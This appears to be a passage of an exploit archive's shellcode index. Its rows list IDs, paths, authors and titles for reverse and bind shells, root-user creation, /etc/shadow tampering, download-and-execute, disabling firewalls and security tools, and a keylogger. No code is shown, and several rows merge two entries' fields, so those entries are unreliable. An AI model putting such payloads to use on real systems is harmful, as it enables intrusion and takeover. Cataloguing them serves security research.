570 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes) Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
571 39885 shellcodes/multiple/39885.c BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
572 39900 shellcodes/windows_x86/39900.c Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
573 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
574 39914 shellcodes/windows_x86/39914.c Windows x86 - system(_systeminfo_) Shellcode (224 bytes) Windows/x86 - system(systeminfo) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
575 39979 shellcodes/windows/39979.c Windows XP < 10 - Download File + Execute Shellcode Windows (XP < 10) - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
576 40005 shellcodes/windows_x86/40005.c Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
577 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
578 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
579 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
581 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
582 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
583 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
584 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
585 40122 shellcodes/linux_x86-64/40122.txt Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
586 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
587 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
588 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
589 40175 shellcodes/windows_x86/40175.c Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
590 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
591 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
592 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
593 40245 shellcodes/windows_x86/40245.c Windows x86 - MessageBoxA Shellcode (242 bytes) Windows/x86 - MessageBoxA Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40246 shellcodes/windows_x86/40246.c Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
595 40259 shellcodes/windows_x86/40259.c Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
596 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes) Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
599 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
600 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
601 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
603 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
604 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
605 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
606 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
613 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
614 43610 shellcodes/osx_ppc/43610.c OSX/PPC - Remote findsock by recv() Key Shellcode 2009-01-01 Dino Dai Zovi shellcode osx_ppc
615 43611 shellcodes/osx_ppc/43611.asm OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode 2009-01-01 H D Moore shellcode osx_ppc
616 43612 shellcodes/osx_ppc/43612.asm OSX/PPC - Stager Sock Find MSG_PEEK Shellcode OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode 2009-01-01 H D Moore shellcode osx_ppc
617 43613 shellcodes/osx_ppc/43613.asm OSX/PPC - Stager Sock Find Shellcode 2009-01-01 H D Moore shellcode osx_ppc
618 43614 shellcodes/osx_ppc/43614.asm OSX/PPC - Stager Sock Reverse Shellcode 2009-01-01 H D Moore shellcode osx_ppc
619 43615 shellcodes/osx_ppc/43615.c OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes) 2009-01-01 H D Moore shellcode osx_ppc
620 43616 shellcodes/osx_ppc/43616.asm OSX/PPC - execve(/bin/sh) Shellcode OSX/PPC - execve(/bin/sh) + Null-Free Shellcode 2009-01-01 ghandi shellcode osx_ppc
621 43617 shellcodes/osx_ppc/43617.c OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes) 2009-01-01 haphet shellcode osx_ppc
622 43618 shellcodes/osx/43618.c OSX/x86 - execve(/bin/sh) Shellcode (24 bytes) 2009-01-01 haphet shellcode osx
623 43626 shellcodes/linux_x86/43626.c Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes) 2009-01-01 vlad902 shellcode linux_x86
667 43669 shellcodes/linux_x86/43669.c Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes) 2009-01-01 bob shellcode linux_x86
668 43670 shellcodes/linux_x86/43670.c Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes) 2009-01-01 bob shellcode linux_x86
669 43671 shellcodes/linux_x86/43671.c Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes) 2009-01-01 bob shellcode linux_x86
670 43672 shellcodes/generator/43672.c Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator) Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator) 2009-01-01 Russell Sanford shellcode generator
671 43673 shellcodes/linux_x86/43673.c Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes) 2009-01-01 sacrine shellcode linux_x86
672 43674 shellcodes/linux_x86/43674.c Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 eSDee shellcode linux_x86
673 43675 shellcodes/linux_x86/43675.c Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes) 2009-01-01 eSDee shellcode linux_x86
682 43688 shellcodes/linux_x86/43688.c Linux/x86 - exit(0) Shellcode (8 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
683 43689 shellcodes/linux_x86/43689.c Linux/x86 - sync Shellcode (6 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
684 43690 shellcodes/linux_x86/43690.c Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
685 43691 shellcodes/linux_x86/43691.c Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes) Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
686 43692 shellcodes/linux_x86/43692.c Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes) Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
687 43694 shellcodes/linux_x86/43694.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes) 2018-01-14 Hashim Jawad shellcode linux_x86
688 43695 shellcodes/linux_x86/43695.c Linux/x86 - Force unmount /media/disk Shellcode (33 bytes) 2010-06-04 gunslinger_ shellcode linux_x86
689 43696 shellcodes/linux_x86/43696.c Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes) 2009-01-01 agix shellcode linux_x86
691 43698 shellcodes/linux_x86/43698.c Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
692 43699 shellcodes/linux_x86/43699.c Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes) 2009-01-01 John Babio shellcode linux_x86
693 43700 shellcodes/linux_x86/43700.c Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes) 2009-01-01 John Babio shellcode linux_x86
694 43701 43702 shellcodes/linux_x86/43701.c shellcodes/linux_x86/43702.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3) 2009-01-01 John Babio Kernel_Panik shellcode linux_x86
43702 shellcodes/linux_x86/43702.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5) 2009-01-01 Kernel_Panik shellcode linux_x86
695 43703 shellcodes/linux_x86/43703.c Linux/x86 - execve(/bin/dash) Shellcode (49 bytes) 2009-01-01 Chroniccommand shellcode linux_x86
696 43704 shellcodes/linux_x86/43704.c Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes) 2009-01-01 antrhacks shellcode linux_x86
697 43705 shellcodes/linux_x86/43705.c Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes) 2009-01-01 John Babio shellcode linux_x86
707 43722 shellcodes/linux_x86/43722.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) 2009-01-01 Hamza Megahed shellcode linux_x86
708 43725 shellcodes/linux_x86/43725.c Linux/x86 - Force Reboot Shellcode (36 bytes) 2009-01-01 Hamza Megahed shellcode linux_x86
709 43724 shellcodes/linux_x86/43724.c Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes) 2009-01-01 Hamza Megahed shellcode linux_x86
710 43726 shellcodes/linux_x86/43726.c Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
711 43727 shellcodes/linux_x86/43727.c Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes) Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
712 43728 shellcodes/linux_x86/43728.c Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
713 43729 shellcodes/linux_x86/43729.c Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
714 43730 shellcodes/linux_x86/43730.c Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
715 43731 shellcodes/linux_x86/43731.c Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
716 43732 shellcodes/linux_x86/43732.c Linux/x86 - Egghunter Shellcode (38 bytes) Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
717 40549 43735 shellcodes/windows_x86-64/40549.c shellcodes/linux_x86/43735.c Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6) 2016-10-17 2013-01-01 Roziul Hasan Khan Shifat Geyslan G. Bem shellcode windows_x86-64 linux_x86
718 40560 43736 shellcodes/windows_x86/40560.asm shellcodes/linux_x86/43736.c Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes) 2016-10-17 2013-01-01 Fugu Geyslan G. Bem shellcode windows_x86 linux_x86
719 40781 43737 shellcodes/windows_x86-64/40781.c shellcodes/linux_x86/43737.c Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes) 2016-11-18 2013-01-01 Roziul Hasan Khan Shifat Geyslan G. Bem shellcode windows_x86-64 linux_x86
720 43738 shellcodes/linux_x86/43738.c Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
721 43739 shellcodes/linux_x86/43739.c Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
722 43740 shellcodes/linux_x86/43740.c Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
723 43741 shellcodes/generator/43741.py Linux/x86 - Uzumaki Encryptor Shellcode (Generator) 2013-01-01 Geyslan G. Bem shellcode generator
724 43742 shellcodes/linux_x86/43742.c Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes) 2009-01-01 Russell Willis shellcode linux_x86
725 43743 shellcodes/linux_x86/43743.c Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes) 2009-01-01 Hamid Zamani shellcode linux_x86
726 43744 shellcodes/linux_x86/43744.c Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes) 2013-05-28 Russell Willis shellcode linux_x86
727 43745 shellcodes/linux_x86/43745.c Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes) 2013-07-03 Russell Willis shellcode linux_x86
728 43746 shellcodes/linux_x86/43746.c Linux/x86 - Bind TCP Shell Shellcode (112 bytes) 2013-07-03 Russell Willis shellcode linux_x86
729 43747 shellcodes/linux_x86/43747.c Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes) 2009-01-01 Daniel Sauder shellcode linux_x86
730 43748 shellcodes/linux_x86/43748.c Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes) 2009-01-01 Daniel Sauder shellcode linux_x86
731 43749 shellcodes/linux_x86/43749.asm Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
732 43750 shellcodes/linux_x86/43750.asm Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
733 43751 shellcodes/linux_x86/43751.asm Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes) 2009-01-01 Shihao Song shellcode linux_x86
734 43752 shellcodes/linux_x86/43752.asm Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
735 43753 shellcodes/linux_x86/43753.c Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes) 2014-06-22 Osanda Malith Jayathissa shellcode linux_x86
736 43754 shellcodes/linux_x86/43754.c Linux/x86 - shutdown -h now Shellcode (56 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86
737 43755 shellcodes/linux_x86/43755.c Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes) 2014-07-13 Julien Ahrens shellcode linux_x86
738 43756 shellcodes/linux_x86/43756.c Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes) 2014-07-25 Julien Ahrens shellcode linux_x86
739 43757 shellcodes/linux_x86/43757.c Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes) 2014-05-08 Ali Razmjoo shellcode linux_x86
740 43758 shellcodes/linux_x86/43758.txt Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) 2009-01-01 Stavros Metzidakis shellcode linux_x86
741 43759 shellcodes/windows_x86/43759.asm Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes) 2009-01-01 H D Moore shellcode windows_x86
742 43760 shellcodes/windows_x86/43760.asm Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes) 2009-01-01 H D Moore shellcode windows_x86
743 43761 shellcodes/windows_x86/43761.asm Windows/x86 - Create Admin User (X) Shellcode (304 bytes) 2009-01-01 H D Moore shellcode windows_x86
744 43762 shellcodes/windows_x86/43762.c Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes) 2009-01-01 OpTix shellcode windows_x86
745 43763 shellcodes/windows_x86/43763.txt Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes) 2009-01-01 Aodrulez shellcode windows_x86
746 43764 shellcodes/windows_x86/43764.c Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes) 2009-01-01 cr4wl3r shellcode windows_x86
747 43765 shellcodes/windows_x86/43765.c Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes) 2009-01-01 agix shellcode windows_x86
748 43766 shellcodes/windows_x86/43766.asm Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes) 2009-01-01 Skylined shellcode windows_x86
749 43767 shellcodes/windows_x86/43767.asm Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes) 2009-01-01 Skylined shellcode windows_x86
750 43768 shellcodes/windows_x86/43768.asm Windows/x86 - Message Box + Null-Free Shellcode (140 bytes) 2009-01-01 Skylined shellcode windows_x86
751 43769 shellcodes/windows_x86/43769.c Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes) 2009-01-01 ZoRLu shellcode windows_x86
752 43770 shellcodes/windows_x86/43770.c Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes) 2009-01-01 ZoRLu shellcode windows_x86
753 43771 shellcodes/windows_x86/43771.c Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes) 2009-01-01 ZoRLu shellcode windows_x86
754 43772 shellcodes/windows_x86/43772.c Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes) 2009-01-01 ZoRLu shellcode windows_x86
755 43773 shellcodes/windows_x86/43773.c Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes) 2010-07-10 John Leitch shellcode windows_x86
756 43774 shellcodes/windows_x86/43774.c Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes) 2009-01-01 d3c0der shellcode windows_x86
757 40549 shellcodes/windows_x86-64/40549.c Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
758 40560 shellcodes/windows_x86/40560.asm Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
759 40781 shellcodes/windows_x86-64/40781.c Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
760 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
761 40821 shellcodes/windows_x86-64/40821.c Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
762 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
763 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
764 40981 shellcodes/windows_x86-64/40981.c Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
765 41072 shellcodes/windows_x86-64/41072.c Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
766 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir Shellcode (25 bytes) Linux/x86-64 - mkdir() Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
767 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
768 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
769 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
770 41220 shellcodes/generator/41220.c Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
771 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
772 41375 shellcodes/linux/41375.c Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
773 41381 shellcodes/windows_x86/41381.c Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
774 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
775 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
776 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter Shellcode (38 bytes) Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
777 41467 shellcodes/windows_x86/41467.c Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
778 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
779 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
780 41481 shellcodes/windows_x86/41481.asm Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
781 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
782 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
783 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
